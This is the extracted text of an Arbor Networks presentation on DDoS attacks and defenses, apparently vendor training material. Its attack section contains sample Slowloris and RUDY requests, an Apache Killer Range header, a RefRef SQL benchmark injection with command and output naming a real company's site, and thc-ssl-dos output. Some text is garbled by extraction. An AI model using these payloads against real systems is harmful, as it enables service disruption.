Herramientas de Seguridad: Prevencion, Proteccion y Mitigacion de ataques de DDoS

Alex Lopezalopez@arbor.net+34 676 99 5439

Ferran Orsolaforsola@arbor.net+34 616 472 433

2Arbor - a Trusted & Proven Vendor Securing the Worlds Largest and Most Demanding Networks

90%PercentageofworldsTier1serviceproviderswhoareArborcustomers 115

NumberofcountrieswithArborproductsdeployed

35,7Tbps

AmountofglobaltrafficmonitoredbytheATLASsecurityintelligenceinitiativerightnow25%ofglobalInternettraffic!

#1

ArbormarketpositioninCarrier,EnterpriseandMobileDDoSequipmentmarketsegments61%oftotalmarket[Infonetics ResearchDec2013]

NumberofyearsArborhasbeendeliveringinnovativesecurityandnetworkvisibilitytechnologies&products

14

$16B

2011GAAPrevenues[USD]ofDanaher Arborsparentcompanyprovidingdeepfinancialbacking

Agenda

3

Smart.Secure.Available.

War Games

Attack TechniquesWhat is DDoS?

Defense Techniques

Smart.Secure.Available.

War Games

Attack Techniques

Agenda

4

Defense Techniques

What is DDoS? What is a DDoS attack? How does DDoS work? Who and why launches DDoS? What types of attacks exist? Am I already protected?

DDoS?

What do I need to defend against?

1 Statesponsoredespionage2 DDoS3 Cloudsecurity4 PasswordManagement5 Sabotage6 Botnets7 InsiderThreat8 Mobility9 Internet10 Privacylaws

Todays enterprise security pains

Serviceavailability/DDoS/Botnets/Cloudservicesprotection/Defacement/BigData

DataLoss/DataBreach/Injections/APT/ZeroDays/Maliciousinsiders/AccountHijacking/Malware/Espionage/Phising/Mobility/BYOD

7

What is DoS and DDoS? In computing, a denial-of-service attack (DoS attack) is an attempt to make a machine

or network resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the efforts of one or more people to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet

A distributed denial of service attack (DDoS) occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. These systems are compromised by attackers using a variety of methods.

During a Distributed Denial of Service (DDoS) attack, compromised hosts or bots coming from distributed sources

overwhelm the target with illegitimate traffic so that the servers can not respond to legitimate clients.

How does a DDoS attack work?

9

The art of DDoS

10

Theart of DDoS

11

Arbor + Google = www.digitalattackmap.com

12

Why are these attacks happening?

13

Is it difficult/expensive to launch an attack?

14http://www.youtube.com/watch?v=c9MuuW0HfSA

Is it difficult/expensive to launch an attack?

15

How does a botnet work?

16

Volunteer botnets are much worse than Zombie botnets, as host resources are fully focused to attackThere are botnets reported of up to 30 million computers!! (BredoLab)In Spain, Mariposa, created by DDP, managed to have as many as.. 12 million infected computers!!

Is it a crime to launch a DDoS attack in Spain?

En relacin con esto se recuerda la entrada en vigor el pasado 23 de diciembre del nuevo Cdigo Penal que dedica uno de sus artculos a describir como delito la conducta que puede identificarse como un ataque DoS, artculo 264:

1. El que por cualquier medio, sin autorizacin y de manera grave borrase, daase, deteriorase, alterase, suprimiese, o hiciese inaccesibles datos, programas informticos o documentos electrnicos ajenos, cuando el resultado producido fuera grave, ser castigado con la pena de prisin de seis meses a dos aos.

2. El que por cualquier medio, sin estar autorizado y de manera grave obstaculizara o interrumpiera el funcionamiento de un sistema informtico ajeno, introduciendo, transmitiendo, daando, borrando, deteriorando, alterando, suprimiendo o haciendo inaccesibles datos informticos, cuando el resultado producido fuera grave, ser castigado, con la pena de prisin de seis meses a tres aos

DicelaLeydeConservacindeDatos25/2007ensuarticulo1: 1.EstaLeytieneporobjetolaregulacindelaobligacindelosoperadoresdeconservarlosdatosgeneradosotratadosen

elmarcodelaprestacindeserviciosdecomunicacioneselectrnicasoderedespblicasdecomunicacin,ascomoeldeberdecesindedichosdatosalosagentesfacultadossiemprequelesseanrequeridosatravsdelacorrespondienteautorizacinjudicialconfinesdedeteccin,investigacinyenjuiciamientodedelitosgravescontempladosenelCdigoPenaloenlasleyespenalesespeciales.2.EstaLeyseaplicaralosdatosdetrficoydelocalizacinsobrepersonasfsicasyjurdicasyalosdatosrelacionadosnecesariosparaidentificaralabonadoousuarioregistrado.

SegnelCodigo Penal,articulo13,losdelitosgravessonaquelloscastigadosconpenagrave.Ylaspenasgraves,articulo33.2

Sonpenasgraves: Laprisinsuperioracincoaos.

InSummary:LaunchingaDDoS attackisacrimebutnotasevereone;therefore,theSPwontresolvetheIPaddressandthereforeitcannotbeprosecuted!!

Is it a crime to launch a DDoS attack in Spain?

18

Spanish Law for Critical Infraestructures Securization

19

Enconsecuencia,ydadalacomplejidaddelamateria,suincidenciasobrelaseguridaddelaspersonasysobreelfuncionamientodelasestructurasbsicasnacionaleseinternacionales,yencumplimientodeloestipuladoporlaDirectiva2008/114/CE,sehaceprecisoelaborarunanormacuyoobjetoes,porunlado,regularlaproteccindelasinfraestructurascrticascontraataques deliberadosdetodotipo(tantodecarcterfsicocomociberntico)y,porotrolado,ladefinicindeunsistemaorganizativodeproteccindedichasinfraestructurasqueaglutinealasAdministracionesPblicasyentidadesprivadasafectadas.Comopiezabsicadeestesistema,laLeycreaelCentroNacionalparalaProteccindelasInfraestructurasCrticascomorganodeasistenciaalSecretariodeEstadodeSeguridadenlaejecucindelasfuncionesqueseleencomiendanastecomorganoresponsabledelsistema.

20

DDoS Attack Types: Volumetric

Volumetric DDoS attacks are designed to saturate and overwhelm network resources, circuits etc by brute force

AttackTraffic

GoodTraffic

ISP 2

ISP 1

ISP n

ISP

SATURATION

TargetApplications&

Services

Firewall IPSLoad

Balancer

DATACENTER

Common attacks:TCPFlood,UDPFlood,Packet Flood,DNSReflection,DNSSec Amplification

21

DDoS Attack Types: State-Exhausting

State-Exhausting DDoS attacks target stateful security devices. Leads to exhaustion of state which render them useless.

ExhaustionofState

ISP 2

ISP 1

ISP n

ISP

Firewall IPSLoad

Balancer

TargetApplications&

Services

DATACENTER

AttackTraffic

GoodTraffic

Common attacks:SYNFlood,RSTFlood,FINFlood,SockStress

Existing perimeter security devices focus on integrity and confidentiality but not on availability

Information Security Triangle

All firewalls and IPS are stateful devices which are targeted by state-based DoS attacks from botnets!

Does my FW/IDS/WAF protect me from DDoS?

22

IPS

Firewalls including WAFs help enforce confidentiality or that information and functions can be accessed only by properly authorized parties

Intrusion Prevention Systems (IPS) help enforce integrity or that information can be added, altered, or removed only by authorized persons

23

DDoS Attack Types: Application Layer

Application-Layer DDoS attacks target specific applications (HTTP, SSL, DNS, SMTP, SIP, etc.).

ISP 2

ISP 1

ISP n

ISP ExhaustionofServiceFirewall IPS

LoadBalancer

TargetApplications&

Services

DATACENTER

AttackTraffic

GoodTraffic

Common attacks:URLFloods,RUDeadYet(RUDY),Slowloris,Pyloris,LOIC,HOIC,DNSdictionaryattacks

IncreasedAttack Tools

More and more tools available to perform the attacks (LOIC, HOIC;

Slowloris, SlowPost)

Increased Complexity

Over quarter of attacks are now application-based DDoS mostly

targeting HTTP, DNS, SMTP

Increased Frequency

More than 50% of data center operators are seeing more than

10 attacks per month

The Increases in DDoS Attacks

The Increased Complexity and Frequency is Driving Demand in Midsize Enterprises

Data Center DDoS Attack and Impact

83.3% of respondents now see between 1 and 50 attacks per month. Proportion of respondents seeing 0 attacks per month drops from 30% to 5.6% Big rise in proportion of respondents seeing attacks targeting infrastructure and

infrastructure services. Operational costs are main expense for data center operators in dealing with

attacks. However nearly a third experience customer churn or revenue loss due to attacks.

DNS Visibility

81% of respondents operate DNS infrastructure. 19% have NO security team responsible for it

An improvement from 23% last year Still not good given the criticality of this service

Nearly three quarters have good visibility at layers 3/4 , but only just over a quarter have layer 7 visibility Needed to detect some types of attacks etc.

Attacks Size historic report & Duration

27

28

Worldwide Infrastructure Security Report

Checkitoutatwww.arbornetworks.com/thearbornetworks7thannualworldwideinfrastructuresecurityreport.html

What impact has DDoS in my business?

29

Source:Gartner Report Making the casefor DDoS protection

.. And attacks are unlikely to stop

30

Agenda

31

Smart.Secure.Available.

War Games

What is DDoS?

Defense Techniques

Attack Techniques How can I perform a DDOS Attack? How difficult it is? Are there tools I can use? Explanations of attacks and tools.

Detailed attack description

32

Traditional DDOS Attacks Volumetric Attacks

UDP Flood ICMP Flood DNS Attacks

DNS dictionary DNS Reflection

NTP Attacks Connection Attacks

SYN Flood Fragmentation Attack

Application's Layer Attacks Exhaustion of Bandwidth

LOIC Exhaustion of Current Sessions

SlowLoris Rudy

Exhaustion of Memory Attacks Apache Killer RefRef

Exhaustion of CPU THC Attack

Update on Traditional DDOS Attacks

High Bandwidth Volumetric DDoS

Description Largevolumeoftrafficinbpsand/orpps.

Trafficcouldbespoofedornotspoofed.

EffectonNetwork Networklinksbecomesaturated. Softwarebasedrouters,switches,firewalls,ISPsgetoverwhelmed.

EffectonServices Legitimateuserscantgettoservices.

CommonNames Packetflood,UDPflood,TCPflood

34

UDP Floods

UDP is stateless, making it good for floods of traffic

Generation of UDP packets is easy Stateless implies spoofing source IP addresses

is possible Packet sizes may range from 60 to 1500 bytes

High volume of small packets can cause forwarding issues for routers and firewalls and other inline devices

1Mpps @60byte = 458Mbps 1Mpps @1400bytes = 10Gbps

35

What are Reflection/Amplification Attacks?

Amplification DDoS Attack Is when an attacker makes a relatively small request that generates a

larger response/reply. This is true of most (not all) server responses.

Reflection DDoS Attack A DDoS attack in which forged requests are sent to a very large number

of Internet connected devices that reply to the requests. Using IP address spoofing, the source address is set to the actual target of the attack, where all replies are sent. Many services can be exploited to act as reflectors.

A Reflection/Amplification DDoS Attack combines both techniques to create a DDoS attack which is both high-volume and difficult to trace back to its point(s) of origin.

Why NTP?

Abbreviation Protocol Ports AmplificationFactor

#AbusableServers

CHARGEN CharacterGenerationProtocol

UDP/19 ~17.75x Tensofthousands(~90K)

DNS DomainNameSystem

UDP/53 ~160x Millions(~30M)

NTP NetworkTimeProtocol

UDP/123 ~1000x Over OneHundredThousand(~128K)

SNMP SimpleNetworkManagementProtocol

UDP/161 ~880x Millions(~5M)

UDP Floods

UDP Floods can cause jitter and latency, impacting other services like VoIP

UPD Floods do not generally impact the server (unless DNS) but do impact the infrastructure causing collateral damage

DNS is the primary attack target with UDP Some attacks use UDP toward typical TCP-

based services HTTP DNS Amplification floods can generate a high

rate of large UDP packets

38

ICMP Flood

ICMP floods attempt to overwhelm the victim Sources continuously send ICMP packets Victim (Server) must process all packets and

attempt to respond to all of the packets

ICMP reflection attack sends a echo request to the broadcast ip with the source of the request spoofed to that of the victim

39

DNS Threats

Multiple threat vectors against DNS whose impacts include loss of service availability, reduced customer satisfaction, and hurt profitability

C

l

i

e

n

t

S

i

d

e

A

t

t

a

c

k

s

S

e

r

v

e

r

S

i

d

e

R

e

f

l

e

c

t

i

v

e

A

t

t

a

c

k

s

DNSServers

DNSServers

AttackTarget

D

N

S

C

a

c

h

e

P

o

i

s

o

n

i

n

g

A

t

t

a

c

k

DNSResolvers

PhishingServers

D

N

S

A

p

p

l

i

c

a

t

i

o

n

L

a

y

e

r

A

t

t

a

c

k

s

DNSServers"RootQueries""RandomQueries""MultipleQueriesperPacket""NXDomainReflective"

40

DB ServerDNS Cache

Attacker requests entries that do not exist in the DNS Cache:

Query: abcd.somedomain.comQuery: efgh.somedomain.comQuery: ijkl.somedomain.com

.

.

DB Server overwhelmed with lookups

NXDomain: abcd.somedomain.comNXDomain: efgh.somedomain.comNXDomain: ijkl.somedomain.com

.

.

.

DNS Dictionary Attack

41

Attacker - a

Victim - v

Resolver - r

A botnet with as few as 20 DSL-connect homes (1 Mbps upstream each) can generate 1.5 Gbps of attack traffic with DNS reflective amplification attack vectors such as those employed for root server attacks in early 2006 (1:76 amplification factor). Most enterprises have little more than 155 Mbps Internet connectivity.

Source IP of Victim (v) spoofed when query sent to resolver, resolver receives, responds to v. 55-byte query elicits 4200-byte response

DNS Amplification Attack

42

What is NTP? NTP = Network Time Protocol Used for clock synchronization between networked devices One of oldest protocols and in operation since the mid-1980s User Datagram Protocol (UDP) on port number 123 Current version is NTPv4 (RFC 5905) A hierarchical, semi-layered system of

time sources called stratum, where the number represents the distance from the reference clock

NTP is the mechanism that synchronizes the clock on your laptop, smartphone, tablet, and network infrastructure devices

Attackersendsmonlist,showpeers,orotherNTPlevel6/7administrative

querieswithtargetportandspoofedIPaddressoftarget

Attackersendsmonlist,showpeers,orotherNTPlevel6/7administrative

querieswithtargetportandspoofedIPaddressoftarget

AbusableNTPServers

NTP Reflection Attack

TargetPort:UDP/80OrUDP/123

NTPservicesreplytotheattacktargetwithstreamsof~468bytepacketssourcedfromUDP/123tothe`target;

thedestinationportisthesourceporttheattackerchosewhilegeneratingtheNTPqueries

NTPservicesreplytotheattacktargetwithstreamsof~468bytepacketssourcedfromUDP/123tothe`target;

thedestinationportisthesourceporttheattackerchosewhilegeneratingtheNTPqueries

Connection Based Attacks

Description Attackerscreatemanyconnectionstotheservicesendingnotrafficorinfrequenttraffic.Sometimestheattackermaysendincompleterequeststotheservices.

EffectonNetwork Availableconnectionstotheserviceareexhausted.StatetablesofFW,IPS,loadbalancerscouldalsogetoverwhelmed.

EffectonServices Legitimateuserscantgettoservices.

CommonNames Sockstress

45

Connection Attacks

Description Attacks that maintain a large number of either

open TCP connections or fully open idle connections impeding new connections from forming on the victim

Common names TCP Idle attack

46

SYN Flood

SYN flood attempts to exhaust the server side resources for TCP connections

Source(s) continuously send packets with just the SYN bit set

Victim (Server) must open a connection and send a SYN-ACK back to the source

Connection is kept open Source ACKs and then data is exchanged Source terminates connection Server times out the connection

SYN packets are typically small in size47

TCP Stack Attack Syn Attack

48

Fragmentation Attacks

Description A flood of TCP or UDP fragments are sent to a

victim overwhelming the victims ability to re-assemble the streams and severely reducing performance

Fragments may also be malformed in some way May be a result of a network mis-configuration

Common names Teardrop, Targa3, Jolt2, Nestea

49

Update on Application's Layer Attacks

Application's Layer Attacks are focus on exhaust resources of the target in order to collapse it and take it down.

We can classify the attacks in groups: Exhaustion of bandwidth: HTTP flood attacks, HTTP

post Attacks, LOIC and Variants. Exhaustion of concurrent sessions: SlowSloris,

SlowPost, nkiller2, recoil. Exhaustion of Memory: Apachekiller Exhaustion of CPU: SSL renegotiation, refref.

Application's Layer Attack

Multiple These attacks correctly follow TCP and HTTP protocol (handshake, distribution of packages).

Volume of attack per source in not very huge and therefore they need multiple attackers at the same time.

Since HTTP responses are much bigger in pps than request a minimal uploading bandwidth use a lot of downloading bandwidth.

Depending of the volume of the attack these attacks could be easily detected by DDOS network Solutions.

Exhaustion of Bandwidth

Wait for Answers and respond to digests. Could use GZIP Can add payloads to the packets PAYLOAD Can randomly change request to hide itself.

Used by Anonymous. Modes:

Manual IRC with Botnets

Attacks: TCP Flood UDP Flood HTTP Flood

Exhaustion of Bandwidth: LOIC

Also known as Low and Slow Attacks Allows a single machine to take down a web server with minimal

bandwidth and side effects on unrelated services and ports Designed to hold open as many connections as possible to the

HTTP server and abuse them by handling of HTTP request headers ssslooowly

Affected servers will keep these connections open, filling their maximum concurrent connection pool, eventually denying additional connection attempts from clients.

Low&Slow Attacks have a high impact and relatively low bandwidth usage

It is pretty hard to detect those low rate attacks from a Solution that is based in Traffic Baselines and Netflow.

Exhaustion of Current Sessions

SlowLoris: Uses HTTP Get requests but the HTTP Header portion is never

completed Slowloris process opens several connections to the target web server

and sends a partial request: one not ending with a /n line This tells the web server to hold on: the rest of the get request is on

its way

Rudy: Uses HTTP POST requests but the HTTP Header portion is

complete and sent in full to the web server. Abuses HTTP web form fields by iteratively injects one custom byte

into a web application post field and goes to sleep Application threads become zombies awaiting ends of posts until

death lurks upon the website

Exhaustion of Current Sessions: Examples

GET http://www.google.com/ HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0Content-Lenght: 42

X-a: bX-a: bX-a: bX-a: bX-a: bX-a: bX-a: b

Exhaustion of Current Sessions: Slowloris

POST http://victim.com/Host: victim.comConnection: keep-aliveContent-Length: 1000000User-Agent: Mozilla/5.0Cookie: __utmz=181569312.1294666144.1.1

Username=A AAAAAAAAAAA

Exhaustion of Current Sessions: R.U.D.Y.

The target of the attack is to overwhelm the Server using lot of memory to make it crash.

These kind of attacks are focus on some Web Application Server/Solution and are abuse some vulnerabilities

Many botnet include these kind of attacks already multiplying the affect of the attack.

Those attacks are oriented to Applications such as Apache, WordPress, & Joomla servers

Server normally goes down in less than 2 minutes.

Exhaustion of Memory Attacks

ApacheKiller: Vulnerability originally discovered by Michal Zalewski

of Google The attack exploits a vulnerability in the way Apache

handles requests based on "Range". If you are sent to servers running Apache 1.3 and 2 Byte

Ranges containing multiple overlapping requests can consume all memory of these.

RefRef: RefRef is the new Anonymous tool that replace LOIC. The attack exploits a vulnerability servers that use database and GET

variables". Flood attack that sends: select

benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f

Exhaustion of Memory Attacks: Examples

HEAD/HTTP/1.1Host:208.109.47.175Range:bytes=0,50,51,52,53,54,55,56,57,58,59,510,511,512,513,514,515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,533,534,535,536,537,538,539,540,541,542,543,544,545,546,547,548,549,550,551,552,553,554,555,556,557,558,559,560,561,562,563,564,565,566,567,568,569,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,595,596,597,598,599,5100,5101,5102,5103,5104,5105,5106,5107,5108,5109,5110,5111,5112,5113,5114,5115,5116,5117,5118,5119,5120,5121,5122,5123,5124,5125,5126,5127,5128,5129,5130,5131,5132,5133,5134,5135,5136,5137,5138,5139,5140,5141,5142,5143,5144,5145,5146,5147,5148,5149,5150,5151,5152,5153,5154,5155,5156,5157,5158,5159,5160,5161,5162,5163,5164,5165,5166,5167,5168,5169,5170,5171,5172,5173,5174,5175,5176,5177,5178,5179,5180,5181,5182,5183,5184,5185,5186,5187,5188,5189,5190,5191,5192,5193,5194,5195,5196,5197,5198,5199,5200,5201,5202,5203,5204,5205,5206,5207,5208,5209,5210,5211,5212,5213,5214,5215,5216,5217,5218,5219,5220,5221,5222,5223,5224,5225,5226,5227,5228,5229,5230,5231,5232,5233,5234,5235,5236,5237,5238,5239,5240,5241,5242,5243,5244,5245,5246,5247,5248,5249,5250,5251,5252,5253,5254,5255,5256,5257,5258,5259,5260,5261,5262,5263,5264,5265,5266,5267,5268,5269,5270,5271,5272,5273,5274,5275,5276,5277,5278,5279,5280,5281,5282,5283,5284,5285,5286,5287,5288,5289,5290,5291,5292,5293,5294,5295,5296,5297,5298,5299,5300,5301,5302,5303,5304,5305,5306,5307,5308,5309,5310,5311,5312,5313,5314,5315,5316,5317,5318,5319,5320,5321,5322,5323,5324,5325,5326,5327,5328,5329,5330,5331,5332,5333,5334,5335,5336,5337,5338,5339,5340,5341,5342,5343,5344,5345,5346,5347,5348,5349,5350,5351,5352,5353,5354,5355,5356,5357,5358,5359,5360,5361,5362,5363,5364,5365,5366,5367,5368,5369,5370,5371,5372,5373,5374,5375,5376,5377,5378,5379,5380,5381,5382,5383,5384,5385,5386,5387,5388,5389,5390,5391,5392,5393,5394,5395,5396,5397,5398,5399,5400,5401,5402,5403,5404,5405,5406,5407,5408,5409,5410,5411,5412,5413,5414,5415,5416,5417,5418,5419,5420,5421,5422,5423,5424,5425,5426,5427,5428,5429,5430,5431,5432,5433,5434,5435,5436,5437,5438,5439,5440,5441,5442,5443,5444,5445,5446,5447,5448,5449,5450,5451,5452,5453,5454,5455,5456,5457,5458,5459,5460,5461,5462,5463,5464,5465,5466,5467,5468,5469,5470,5471,5472,5473,5474,5475,5476,5477,5478,5479,5480,5481,5482,5483,5484,5485,5486,5487,5488,5489,5490,5491,5492,5493,5494,5495,5496,5497,5498,5499,5500,5501,5502,5503,5504,5505,5506,5507,5508,5509,5510,5511,5512,5513,5514,5515,5516,5517,5518,5519,5520,5521,5522,5523,5524,5525,5526,5527,5528,5529,5530,5531,5532,5533,5534,5535,5536,5537,5538,5539,5540,5541,5542,5543,5544,5545,5546,5547,5548,5549,5550,5551,5552,5553,5554,5555,5556,5557,5558,5559,5560,5561,5562,5563,5564,5565,5566,5567,5568,5569,5570,5571,5572,5573,5574,5575,5576,5577,5578,5579,5580,5581,5582,5583,5584,5585,5586,5587,5588,5589,5590,5591,5592,5593,5594,5595,5596,5597,5598,5599,5600,5601,5602,5603,5604,5605,5606,5607,5608,5609,5610,5611,5612,5613,5614,5615,5616,5617,5618,5619,5620,5621,5622,5623,5624,5625,5626,5627,5628,5629,5630,5631,5632,5633,5634,5635,5636,5637,5638,5639,5640,5641,5642,5643,5644,5645,5646,5647,5648,5649,5650,5651,5652,5653,5654,5655,5656,5657,5658,5659,5660,5661,5662,5663,5664,5665,5666,5667,5668,5669,5670,5671,5672,5673,5674,5675,5676,5677,5678,5679,5680,5681,5682,5683,5684,5685,5686,5687,5688,5689,5690,5691,5692,5693,5694,5695,5696,5697,5698,5699,5700,5701,5702,5703,5704,5705,5706,5707,5708,5709,5710,5711,5712,5713,5714,5715,5716,5717,5718,5719,5720,5721,5722,5723,5724,5725,5726,5727,5728,5729,5730,5731,5732,5733,5734,5735,5736,5737,5738,5739,5740,5741,5742,5743,5744,5745,5746,5747,5748,5749,5750,5751,5752,5753,5754,5755,5756,5757,5758,5759,5760,5761,5762,5763,5764,5765,5766,5767,5768,5769,5770,5771,5772,5773,5774,5775,5776,5777,5778,5779,5780,5781,5782,5783,5784,5785,5786,5787,5788,5789,5790,5791,5792,5793,5794,5795,5796,5797,5798,5799,5800,5801,5802,5803,5804,5805,5806,5807,5808,5809,5810,5811,5812,5813,5814,5815,5816,5817,5818,5819,5820,5821,5822,5823,5824,5825,5826,5827,5828,5829,5830,5831,5832,5833,5834,5835,5836,5837,5838,5839,5840,5841,5842,5843,5844,5845,5846,5847,5848,5849,5850,5851,5852,5853,5854,5855,5856,5857,5858,5859,5860,5861,5862,5863,5864,5865,5866,5867,5868,5869,5870,5871,5872,5873,5874,5875,5876,5877,5878,5879,5880,5881,5882,5883,5884,5885,5886,5887,5888,5889,5890,5891,5892,5893,5894,5895,5896,5897,5898,5899,5900,5901,5902,5903,5904,5905,5906,5907,5908,5909,5910,5911,5912,5913,5914,5915,5916,5917,5918,5919,5920,5921,5922,5923,5924,5925,5926,5927,5928,5929,5930,5931,5932,5933,5934,5935,5936,5937,5938,5939,5940,5941,5942,5943,5944,5945,5946,5947,5948,5949,5950,5951,5952,5953,5954,5955,5956,5957,5958,5959,5960,5961,5962,5963,5964,5965,5966,5967,5968,5969,5970,5971,5972,5973,5974,5975,5976,5977,5978,5979,5980,5981,5982,5983,5984,5985,5986,5987,5988,5989,5990,5991,5992,5993,5994,5995,5996,5997,5998,5999,51000,51001,51002,51003,51004,51005,51006,51007,51008,51009,51010,51011,51012,51013,51014,51015,51016,51017,51018,51019,51020,51021,51022,51023,51024,51025,51026,51027,51028,51029,51030,51031,51032,51033,51034,51035,51036,51037,51038,51039,51040,51041,51042,51043,51044,51045,51046,51047,51048,51049,51050,51051,51052,51053,51054,51055,51056,51057,51058,51059,51060,51061,51062,51063,51064,51065,51066,51067,51068,51069,51070,51071,51072,51073,51074,51075,51076,51077,51078,51079,51080,51081,51082,51083,51084,51085,51086,51087,51088,51089,51090,51091,51092,51093,51094,51095,51096,51097,51098,51099,51100,51101,51102,51103,51104,51105,51106,51107,51108,51109,51110,51111,51112,51113,51114,51115,51116,51117,51118,51119,51120,51121,51122,51123,51124,51125,51126,51127,51128,51129,51130,51131,51132,51133,51134,51135,51136,51137,51138,51139,51140,51141,51142,51143,51144,51145,51146,51147,51148,51149,51150,51151,51152,51153,51154,51155,51156,51157,51158,51159,51160,51161,51162,51163,51164,51165,51166,51167,51168,51169,51170,51171,51172,51173,51174,51175,51176,51177,51178,51179,51180,51181,51182,51183,51184,51185,51186,51187,51188,51189,51190,51191,51192,51193,51194,51195,51196,51197,51198,51199,51200,51201,51202,51203,51204,51205,51206,51207,51208,51209,51210,51211,51212,51213,51214,51215,51216,51217,51218,51219,51220,51221,51222,51223,51224,51225,51226,51227,51228,51229,51230,51231,51232,51233,51234,51235,51236,51237,51238,51239,51240,51241,51242,51243,51244,51245,51246,51247,51248,51249,51250,51251,51252,51253,51254,51255,51256,51257,51258,51259,51260,51261,51262,51263,51264,51265,51266,51267,51268,51269,51270,51271,51272,51273,51274,51275,51276,51277,51278,51279,51280,51281,51282,51283,51284,51285,51286,51287,51288,51289,51290,51291,51292,51293,51294,51295,51296,51297,51298,51299

AcceptEncoding:gzipConnection:close

Exhaustion of Memory Attacks: ApacheKiller

GET/viewNews.php?id=53%20and%20(select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))HTTP/1.1TE:deflate,gzip;q=0.3Connection:TE,closeHost:www.eudragene.localUserAgent:Mozilla/5.0(Windows;U;WindowsNT5.1;nl;rv:1.8.1.12)Gecko/20080201Firefox/2.0.0.12

perlrefref.plhttp://www.telefonica.com/viewNews.php?id=53

==#RefRefhttp://hackingalert.blogspot.com==

[+]Target:http://www.telefonica.com/viewNews.php?id=53

[+]Startingtheattack[+]Info:control+cforstopattack[+]WebOff

==RefRefhttp://hackingalert.blogspot.com==

Exhaustion of Memory Attacks: RefRef

The easy way to overwhelm a server is by attack HTTPS Server since the SSL handshake use lots of CPU due to encryption.

Many DDOS tools and botnets are able to perform HTTPS attacks.

Network Solutions Based can stop HTTPS attacks on protocol or resources exhaustion.

Slow&Slow attacks again HTTPS Servers must be stopped by decrypting the traffic

Enterprises are managing their own SSL Certificate and will not let ISP to open those tunnels

The only way to stop these attacks are by decrypt/analyses/encrypt these connections.

Latest versions of SlowLoris and Siege already support HTTPS. In 2012 we have seen the first botnet that supports it too.

Exhaustion of CPU

TCP HandShake SSL HandShake

Exhaustion of CPU: Two Handshakes

thc-ssl-dos -l 1 192.168.127.1 8443 --accept______________ ___ _________\__ ___/ | \ \_ ___ \| | / ~ \/ \ \/| | \ Y /\ \____|____| \___|_ / \______ /

\/ \/http://www.thc.org

Twitter @hackerschoice

Greetingz: the french underground

Waiting for script kiddies to piss off................The force is with those who read the source...

Handshakes 0 [0.00 h/s], 1 Conn, 0 ErrHandshakes 128 [136.44 h/s], 1 Conn, 0 ErrHandshakes 260 [132.65 h/s], 1 Conn, 0 ErrHandshakes 400 [136.49 h/s], 1 Conn, 0 ErrHandshakes 550 [145.47 h/s], 1 Conn, 0 ErrHandshakes 694 [152.00 h/s], 1 Conn, 0 ErrHandshakes 834 [140.42 h/s], 1 Conn, 0 ErrHandshakes 973 [139.26 h/s], 1 Conn, 0 Err

Exhaustion of CPU: HTTPS renegotiation

Agenda

65

Smart.Secure.Available.

War Games

Attack TechniquesWhat is DDoS?

Defense Techniques How can I protected clients

connected to my network? ISP DDOS Solution Deployment,

how it works? Defense in Layers.

Stopping Attacks in the Right Place

Arbors Key Technologies

67

Visibility

Flow Intelligence

Arbors products are the premier analyzers of full network

flow data providing holistic traffic & security visibility

Application Intelligence

Arbors products

offer deep insight intoapplications and services

as more services move to standard

ports

Global Intelligence

Arbors products

leverage the real-time Internet-

wide visibility ofthe ATLAS initiative to detect and stop active

threats

Protection

Arbors core packet

analysis & blocking

engine can stop and is

also immune to all threats

against availability.

Botnets & Malware

Arbors Security & Emergency Response

Team (ASERT) conducts unique

researchinto botnets

and malware.

Cloud Signaling

Arbors proprietary

protocol enables signaling from the

enterprise edge to the

cloud for complete protection

Availability Engine

Peakflow Products

68

Visibility Protection

Peakflow TMSPeakflow SP

Models: CP-6000, PI-6000, BI-6000, FS-6000

The Peakflow Service Provider (SP) solution collects and analyzes Flow, BGP, and SNMP data; conducts network anomaly detection for security visibility; provides user interface for managed services; and massive scale to meet the needs of the worlds largest service providers and cloud operators.

Models: TMS-2300 & TMS-4000 Series

The Peakflow Threat Management System (TMS) is built for high-performance, carrier-class networks and used for surgical mitigation of DDoS attack traffic with no additional latency for legitimate traffic; and serves as protection platform for in-cloud managed security services.

Pravail Products

69

Visibility Protection

Pravail APSPravail NSI

Models: Collectors 5003, 5004, 5005, 5006, 5007; Controllers 5110, 5120, 5130, 5220, 5230The Pravail Network Security Intelligence (NSI) solution (formally known as Peakflow X) collects and analyzes Flow and raw packet data; performs behavioral anomaly detection; and provides application-level and pervasive security intelligence across the enterprise network.

Models: APS 2202, APS-2203- APS 2004, APS-2104, APS-2105, APS-2107, APS-2108The Pravail Availability Protection System (APS) provides out-of-box protection for attacks while being immune to state-exhausting attacks; blocks complex application-layer DDoS; supports a dynamic threat from ATLAS to stop botnets; supports inline deployment models; and ability to send cloud signals upstream.

The ATLAS Initiative

70

The ATLAS initiative is the worlds most comprehensive Internet monitoring &

security intelligence systemServices: ATLAS Intelligence Feed (AIF), Active Threat Feed (ATF), Fingerprint Sharing, Global Threat Analysis Portal

ATLAS intelligence is seamlesslyintegrated into Arbors products and service including real-time services, global threat intelligence, and insight into key Internet trends.

ASERT, Arbors Security Engineering and Research Team, also leverages ATLAS to provide expert commentary on security trends and to address the significant Internet research questions.

ActiveThreatFeed(ATF)

71

ASERT Threat Detection/Classification

Honeypots &SPAM Traps

ATLAS

SecurityCommunity

2.2M +samples

DDoSFamily

Over 2 dozen malware sources

20 50KMalware samples/day

Sandbox of Virtual Machines run malware(look for botnet C&C, files, network behavior)

Fingerprint

Report and PCAP stored in database

Tracker DDoS AttackAuto-classification and analysis every 24 hrs.

CLOUDProvider A

Peakflow SP / TMS - Solution Overview

PEERING EDGE

CPCP

A Central Console for Visibility & Security

Collector Platform (CP) collects and analyzes IP Flow, BGP, and SNMP data; conducts network anomaly detection; traffic & service reporting; provides user interface; manages other SP devices (i.e. TMS).

Peakflow SP CP

Threat Management System (TMS) built for carrier-class networks and used for surgical mitigation of attack traffic; conducts service performance monitoring; serves as platform for in-cloud managed security services.

Peakflow SP TMS

= Pravail APS

TMSTMS

Provider B

Provider C

VISIBILITIY DETECTION MITIGATION

NETWORKWIDE

DDoS - Mitigation

CPCP

TMSTMS

DDoS - Mitigation

CPCP

